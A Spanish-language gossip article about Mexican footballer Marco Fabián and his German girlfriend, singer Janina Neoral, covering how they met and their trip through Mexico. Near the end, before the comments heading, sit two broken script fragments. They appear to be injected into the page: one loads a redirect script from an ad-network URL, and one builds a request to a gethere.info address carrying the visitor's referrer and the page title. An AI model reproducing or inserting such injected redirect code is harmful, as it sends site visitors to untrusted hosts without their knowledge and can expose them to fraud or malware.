Janina Neoral, lo único bueno que ha tenido Marco Fabián en Alemania

Marco Fabián aún no se estrena como romperredes en el Eintracht Frankfurt de la Bundesliga, ya que ha sufrido para acumular minutos de juego, pero fuera de las canchas, el tapatío aprovecha bien su tiempo y ya anotó uno de sus mejores “goles” en tierras alemanas.

El exvolante de Chivas conquistó a una hermosa cantante teutona llamada Janina Neoral, a quien trajo de vacaciones a México para presentarla como su novia con su familia.

Antes de arribar a nuestro país, la pareja tomó un descanso en Los Angeles y Las Vegas, después volaron con su familia a Guadalajara y Puerto Vallarta. También pasearon por la CDMX, donde fueron captados en un restaurante de Polanco, para posteriormente emprender su viaje a Cancún.

Marco, de 26 años, contó que conoció a Janina, de la misma edad, en un café de Colonia en una de sus visitas a Javier ‘Chicharito’ Hernández. Tras salir con ella durante un mes, iniciaron un noviazgo y pronto cumplirán cuatro meses de relación.

A pesar de que ella no habla español ni él alemán, Fabián aseguró que el idioma no ha sido un obstáculo.

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Comentarios